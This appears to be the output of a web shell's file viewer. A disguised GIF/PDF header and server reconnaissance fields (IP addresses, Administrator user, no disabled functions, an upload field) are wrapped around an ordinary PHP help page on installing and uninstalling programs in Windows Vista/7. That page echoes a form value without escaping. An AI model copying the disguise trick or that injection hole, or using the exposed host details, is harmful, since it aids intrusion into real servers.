GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Setup/Vista/ |
Upload File : |
<? // Setup/Vista/index.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); $title = "How to install or uninstall a program in Windows Vista and Windows 7"; $headTitle = '_CST_ - '.$title; $pageTitle = '_CST_<br>'.$title; include('common/pageHeader.phpinc'); $sectionTitle = $title; include('common/sectionHeader.phpinc'); $installer=formValue('installer',''); if ($installer == '') { $installer = 'C:\My Documents\My Downloads\MyInstaller.msi'; } if (strstr($installer," ")) { $installer = '"'.$installer.'"'; $quotes = ' enclosed in quotes'; } else { $quotes = ''; } $installer = str_replace('\\\\','\\',$installer); ?> <p><a name="run_as_administrator"> </a> <fieldset><legend>How to always run a program as administrator in Windows Vista, Windows 7, and Windows 8</legend> Many utilities need to be run as administrator in order to function properly, especially older utilities that haven't been updated to support Vista yet. <br> All shortcuts in Windows Vista have a special property that you can set that will allow the application to run as Administrator. <br> This works perfectly for creating a batch file to restart a service, for instance. <ol> <li> If you do not already have a shortcut to the program then right-click on the program and select <b>Create <u>S</u>hortcut</b> to create one. </li> <li> Right-click on the shortcut, and click the Advanced button on the Shortcut page to get to the Advanced Properties dialog. <br> <img src="Vista_run_as_administrator_advanced.png" alt="Advanced..." /> </li> <li> Select the <b>Run as administrator</b> option and click <b>OK</b>. <br> <img src="Vista_run_as_administrator_advanced_properties.png" alt="Run as adminisrator" /> </li> </ol> <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">Close</a> this window.</p> </fieldset> </p> <p><a name="controlpanel"> </a> <fieldset><legend>How to open the control panel in Windows Vista and Windows 7</legend> <ol> <li> Click on the <strong>Start</strong> button to open your Start Menu. The Start button looks like this: <img src="Vista_start_button.png" alt="Vista Start Button" align="absbottom" height="29" width="30"> </li> <li> When the Start Menu opens click on the <strong>Control Panel</strong> menu option. </li> </ol> <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">Close</a> this window.</p> </fieldset> </p> <p><a name="run_exe"> </a> <fieldset><legend>How to run a program as administrator in Windows Vista and Windows 7</legend> <ol> <li> Right-click on the file name and select <b>Run as administrator</b>. </li> </ol> <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">Close</a> this window.</p> </fieldset> </p> <p><a name="install_msi"> </a> <fieldset><legend>How to run an <b>M</b>icro<b>s</b>oft <b>i</b>nstaller (*.msi) as administrator in Windows Vista and Windows 7</legend> <ol> <li> Open a command window as Administrator. Click on the <strong>Start</strong> button to open your Start Menu. The Start button looks like this: <img src="Vista_start_button.png" alt="Vista Start Button" align="absbottom" height="29" width="30"> </li> <li> When the Start Menu opens click on <b>Accessories</b>. </li> <li> When the Accessories display right-click on <b>Command Prompt</b> and select <b>Run as administrator</b> from the context menu. </li> <li> When the command window comes up type in <b>msiexec /i</b>, a space, the full path to the MSI installer<?=$quotes?>, and hit enter. <br> (IE: <b>msiexec /i <?=$installer?></b>) <br> <span class="info">Warning: If the path to the installer has spaces in it then you must enclose the path in quotes.</span> </li> </ol> <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">Close</a> this window.</p> </fieldset> </p> <p><a name="uninstall"> </a> <fieldset><legend>How to uninstall a program in Windows Vista and Windows 7</legend> <ol> <li> Open the control panel (see <a href="#controlpanel"><b>How to open the control panel in Windows Vista and Windows 7</b></a> above). <br> When the Control Panel window opens click on the <strong>Uninstall a program</strong> option option under the Programs category. <br> If you are using the Classic View of the Control Panel, then you would double-click on the <strong>Programs and Features</strong> icon instead.<br> <br> <img src="Vista_control_panel.png" alt="Vista Control Panel"> </li> <li> You will now be at the <strong>Programs and Features</strong>, or Uninstall or change a program, screen as shown below. <br> From this screen you can uninstall programs, view installed updates, examine your digital locker, and turn Windows features on and off. <br> <img src="Vista_programs-and-features.png" alt="Vista Programs and Features" /> </li> <li> Find the program you would like to uninstall and click on it. You will see two new options next to the Organize and View button called <b>Uninstall</b> and <b>Change</b>. Click on the <b>Uninstall</b> button. <br> <img src="Vista_uninstall_selected.png" alt="Vista uninstall selected" /> </li> <li> For some programs when choose to uninstall it. Windows may prompt you with a message stating <b>Windows needs your permission to continue</b>. At this screen you should click on the <b>Continue</b> button. <br> You will then get a confirmation window to perform the uninstall. Click <b>Yes</b>. <br> <img src="Vista_uninstall_confirmation.png" alt="Vista uninstall confirmation" /> </li> <li> Follow any instructions and answer any questions that follow. </li> </ol> <a href="javascript:window.open('','_parent','');window.close();" onclick="window.open('','_parent','');window.close();return false;">Close</a> this window.</p> </fieldset> </p> <? include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>